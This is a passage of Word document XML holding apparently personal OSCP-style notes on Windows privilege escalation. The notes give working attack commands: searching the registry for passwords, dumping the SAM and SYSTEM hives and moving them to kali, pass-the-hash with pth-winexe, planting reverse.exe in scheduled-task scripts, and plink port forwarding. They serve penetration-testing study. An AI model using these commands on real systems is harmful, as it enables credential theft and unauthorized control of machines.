      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>add –system if admin creds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495F126C" w14:textId="15E94F37" w:rsidR="005C60A3" w:rsidRDefault="005C60A3">
      <w:r>
        <w:t xml:space="preserve">Manual search if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>absolutely necessary</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="32909D0A" w14:textId="0E150129" w:rsidR="005C60A3" w:rsidRDefault="005C60A3">
      <w:r>
        <w:tab/>
        <w:t>Reg query HKLM /f password /t REG_SZ /s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DA3D76" w14:textId="5FF9CB4E" w:rsidR="005C60A3" w:rsidRDefault="005C60A3">
      <w:r>
        <w:tab/>
        <w:t>Reg query HKCU /f password /t REG_SZ /s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF9553E" w14:textId="71AC2A20" w:rsidR="005C60A3" w:rsidRPr="005C60A3" w:rsidRDefault="005C60A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Saved Creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587D2777" w14:textId="0BD8B995" w:rsidR="00730F09" w:rsidRDefault="00730F09">
      <w:r>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmdkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /list and look for admin. If so, do the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04664EEF" w14:textId="0FFEE8B7" w:rsidR="00730F09" w:rsidRDefault="00730F09">
      <w:r>
        <w:tab/>
        <w:t>Listen on kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6BB423" w14:textId="145445C0" w:rsidR="00730F09" w:rsidRDefault="00730F09">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Runas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>savecred</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>user:admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> FULLPATH\reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00048835" w14:textId="52800C2A" w:rsidR="00730F09" w:rsidRPr="00730F09" w:rsidRDefault="009608A8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SAM and SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41095356" w14:textId="77777777" w:rsidR="009608A8" w:rsidRDefault="009608A8" w:rsidP="009608A8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Move hash files to C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCEE3DC" w14:textId="77777777" w:rsidR="009608A8" w:rsidRDefault="009608A8" w:rsidP="009608A8">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Reg save </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hklm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> c:\sam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25082BB1" w14:textId="253E70BD" w:rsidR="009608A8" w:rsidRDefault="009608A8" w:rsidP="009608A8">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Reg save </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hklm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\system c:\system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559CE276" w14:textId="191CF128" w:rsidR="009608A8" w:rsidRDefault="009608A8" w:rsidP="009608A8">
      <w:r>
        <w:t xml:space="preserve">Also do that for SAM and SYSTEM that kali finds, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="065C460E" w14:textId="5CE010CF" w:rsidR="009608A8" w:rsidRDefault="009608A8" w:rsidP="009608A8">
      <w:r>
        <w:tab/>
        <w:t>Copy FULLPATH\SAM SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF1CD16" w14:textId="765E5560" w:rsidR="009608A8" w:rsidRDefault="009608A8" w:rsidP="009608A8">
      <w:r>
        <w:tab/>
        <w:t>Copy FULLPATH\SYSTEM SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4580E4B1" w14:textId="77777777" w:rsidR="009608A8" w:rsidRDefault="009608A8" w:rsidP="009608A8">
      <w:r>
        <w:t>Then transfer to kali and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD22766" w14:textId="77777777" w:rsidR="009608A8" w:rsidRDefault="009608A8" w:rsidP="009608A8">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Samdump2 system </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="554ABB5E" w14:textId="5DAB9A2E" w:rsidR="00730F09" w:rsidRDefault="009608A8">
      <w:r>
        <w:t>If the first part of the hash is the same across all users, use the second part to crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2177768C" w14:textId="77777777" w:rsidR="009608A8" w:rsidRDefault="009608A8" w:rsidP="009608A8">
      <w:r>
        <w:t>Spawn a shell with new credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0BA1C3" w14:textId="77777777" w:rsidR="009608A8" w:rsidRDefault="009608A8" w:rsidP="009608A8">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -U ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user@password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">’ //RHOST cmd.exe </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>add –system if admin creds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A735C9" w14:textId="239FC7C7" w:rsidR="005C60A3" w:rsidRPr="009608A8" w:rsidRDefault="009608A8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passing the hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31558721" w14:textId="14099428" w:rsidR="009608A8" w:rsidRDefault="009608A8">
      <w:r>
        <w:t xml:space="preserve">If have hash but </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> crack it, pass the hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E857867" w14:textId="2DAAF35F" w:rsidR="009608A8" w:rsidRDefault="009608A8">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pth-winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -U ‘FULLHASH’ //RHOST cmd.exe  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>add –system if admin creds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12474334" w14:textId="5A9FD77D" w:rsidR="009608A8" w:rsidRPr="009608A8" w:rsidRDefault="009608A8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009608A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Scheduled tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C18332F" w14:textId="788C2A37" w:rsidR="00D47DB7" w:rsidRDefault="00D47DB7">
      <w:r>
        <w:t>Try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EFEEB2" w14:textId="424A0114" w:rsidR="009608A8" w:rsidRDefault="00D47DB7" w:rsidP="00D47DB7">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D47DB7">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D47DB7">
        <w:t>ScheduledTask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D47DB7">
        <w:t xml:space="preserve"> | where {$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D47DB7">
        <w:t>_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D47DB7">
        <w:t>TaskPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D47DB7">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D47DB7">
        <w:t>notlike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D47DB7">
        <w:t xml:space="preserve"> "\Microsoft*"} | ft </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D47DB7">
        <w:t>TaskName,TaskPath,Sta</w:t>
      </w:r>
      <w:r>
        <w:t>te</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02211F79" w14:textId="039D7A8C" w:rsidR="009608A8" w:rsidRDefault="00D47DB7">
      <w:r>
        <w:t xml:space="preserve">Otherwise </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gotta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> look around for interesting scripts and read them </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FD1FEA" w14:textId="1784CD6D" w:rsidR="009E15DA" w:rsidRDefault="00D47DB7">
      <w:r>
        <w:t>Then check permission</w:t>
      </w:r>
      <w:r w:rsidR="009E15DA">
        <w:t xml:space="preserve"> and see what can be done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC981C6" w14:textId="10EBAF3A" w:rsidR="009E15DA" w:rsidRDefault="009E15DA">
      <w:r>
        <w:tab/>
        <w:t>Accesschk.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accepteula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>quv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> user SCRIPTNAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CADFE11" w14:textId="79175F1B" w:rsidR="009E15DA" w:rsidRDefault="009E15DA">
      <w:r>
        <w:t xml:space="preserve">If we can write, insert reverse shell. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A890AA" w14:textId="0018AE9A" w:rsidR="009E15DA" w:rsidRDefault="009E15DA">
      <w:r>
        <w:tab/>
        <w:t>Echo reverse.exe &gt;&gt; SCRIPTNAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEEF1F5" w14:textId="3931C2B3" w:rsidR="009E15DA" w:rsidRDefault="009E15DA">
      <w:r>
        <w:t xml:space="preserve">Wait </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>til</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the script is run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45071329" w14:textId="4AA5D472" w:rsidR="009E15DA" w:rsidRPr="009E15DA" w:rsidRDefault="009E15DA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E15DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure GUI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="009E15DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266E1C85" w14:textId="62E37DC3" w:rsidR="009E15DA" w:rsidRDefault="009E15DA">
      <w:r>
        <w:t>If in RDP, open different GUI apps (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> paint) and while they are running,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4866F26C" w14:textId="54B34609" w:rsidR="009E15DA" w:rsidRDefault="009E15DA">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tasklist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /V | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>findstr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> mspaint.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6F2DEF" w14:textId="26FC8281" w:rsidR="009E15DA" w:rsidRDefault="009E15DA">
      <w:r>
        <w:t>If running as admin,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4027539C" w14:textId="46643078" w:rsidR="009E15DA" w:rsidRDefault="009E15DA">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">File &gt; Open &gt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00072086">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>file://c:/windows/system32/cmd.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> at top</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275119E5" w14:textId="097F4C25" w:rsidR="009E15DA" w:rsidRPr="009E15DA" w:rsidRDefault="009E15DA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E15DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Startup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E15DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> apps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114DB4E1" w14:textId="77777777" w:rsidR="009E15DA" w:rsidRPr="00816F6D" w:rsidRDefault="009E15DA" w:rsidP="009E15DA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Need admin to login for this so unlikely but check </w:t>
      </w:r>
      <w:r w:rsidRPr="009E15DA">
        <w:t>https://liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html#windows-1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14228F58" w14:textId="7E8954DE" w:rsidR="009E15DA" w:rsidRPr="00311F1C" w:rsidRDefault="00311F1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00311F1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Installed apps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Proccesses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> information)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C45EA9" w14:textId="3BF251C8" w:rsidR="00311F1C" w:rsidRDefault="00311F1C">
      <w:r>
        <w:t xml:space="preserve">Look for interesting programs in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and search for exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52453E8C" w14:textId="47EE3B9A" w:rsidR="009E15DA" w:rsidRPr="00311F1C" w:rsidRDefault="00311F1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00311F1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hot potato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2265BC" w14:textId="6CAB1F3B" w:rsidR="00311F1C" w:rsidRDefault="00311F1C">
      <w:r>
        <w:t xml:space="preserve">Works on Windows 7, 8, and early 10 but </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> should suggest it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDA0368" w14:textId="7BA5CCC2" w:rsidR="00311F1C" w:rsidRDefault="00CB7BFD">
      <w:r w:rsidRPr="00CB7BFD">
        <w:t>https://github.com/foxglovesec/Potato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FD1316" w14:textId="4AACB8E9" w:rsidR="00311F1C" w:rsidRPr="00CB7BFD" w:rsidRDefault="00CB7BFD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB7BFD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Token impersonation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666C3768" w14:textId="3793F047" w:rsidR="00CB7BFD" w:rsidRDefault="00CB7BFD">
      <w:r>
        <w:t>See which privilege</w:t>
      </w:r>
      <w:r w:rsidR="00243D58">
        <w:t xml:space="preserve">s the service </w:t>
      </w:r>
      <w:r>
        <w:t>ha</w:t>
      </w:r>
      <w:r w:rsidR="00243D58">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB9A465" w14:textId="372008F9" w:rsidR="00CB7BFD" w:rsidRDefault="00CB7BFD">
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>priv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11201B70" w14:textId="37E7F299" w:rsidR="00CB7BFD" w:rsidRDefault="00CB7BFD">
      <w:r>
        <w:t xml:space="preserve">Particularly interesting are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SeImpersonatePrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E900DD">
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SeAssignPrimaryToken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> but check OS version for which </w:t>
      </w:r>
      <w:r w:rsidR="00E900DD">
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7FBD04" w14:textId="09C9B96E" w:rsidR="00CB7BFD" w:rsidRDefault="00CB7BFD">
      <w:r>
        <w:t>Check which privileges are useful here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A229249" w14:textId="41759940" w:rsidR="00CB7BFD" w:rsidRDefault="00034E76" w:rsidP="00E900DD">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidR="00E900DD" w:rsidRPr="00072086">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="578514B3" w14:textId="7C27F23B" w:rsidR="00243D58" w:rsidRDefault="00243D58" w:rsidP="00243D58">
      <w:r>
        <w:t>USER privileges are very useful too, and they don’t even have to be enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4071D8AB" w14:textId="311B4E74" w:rsidR="00E900DD" w:rsidRPr="00E900DD" w:rsidRDefault="00E900DD" w:rsidP="00E900DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E900DD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26260ACC" w14:textId="5DA221DE" w:rsidR="00BE401C" w:rsidRDefault="00C17765" w:rsidP="00BE401C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> identifies services running on localhost. </w:t>
      </w:r>
      <w:r w:rsidR="00BE401C">
        <w:t xml:space="preserve">These can be vulnerable (check what it is with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BE401C">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BE401C">
        <w:t>) so we need to make them available externally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFA1BB7" w14:textId="3364DE59" w:rsidR="00BE401C" w:rsidRDefault="00BE401C" w:rsidP="00BE401C">
      <w:r>
        <w:t>SSH needs to be available on kali so edit /etc/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sshd_config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and make sure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>permitrootlogin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is set to yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB2D918" w14:textId="5EAC3474" w:rsidR="00BE401C" w:rsidRDefault="00BE401C" w:rsidP="00BE401C">
      <w:r>
        <w:t xml:space="preserve">Then service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F653497" w14:textId="20D96B8A" w:rsidR="00BE401C" w:rsidRDefault="00BE401C" w:rsidP="00BE401C">
      <w:r>
        <w:t>Now start the link from windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFF4ACC" w14:textId="0C16846F" w:rsidR="00BE401C" w:rsidRDefault="00BE401C" w:rsidP="00BE401C">
      <w:r>
        <w:tab/>
        <w:t>Plink.exe root@</w:t>
      </w:r>
      <w:r w:rsidR="002F38F6">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F38F6">
        <w:t>mymachine</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F38F6">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -R </w:t>
      </w:r>
      <w:r w:rsidR="002F38F6">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F38F6">
        <w:t>serviceport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F38F6">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>:127.0.0.1:</w:t>
      </w:r>
      <w:r w:rsidR="002F38F6">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F38F6">
        <w:t>serviceport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F38F6">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEE8A22" w14:textId="59977119" w:rsidR="00BE401C" w:rsidRDefault="00BE401C" w:rsidP="00E900DD">
      <w:r>
        <w:t xml:space="preserve">This method can also be used to make processes work such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> which runs on port 445. This needs to be done if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>winexe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hangs (remember to kill SMB on kali    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pkill</w:t>
      </w:r>
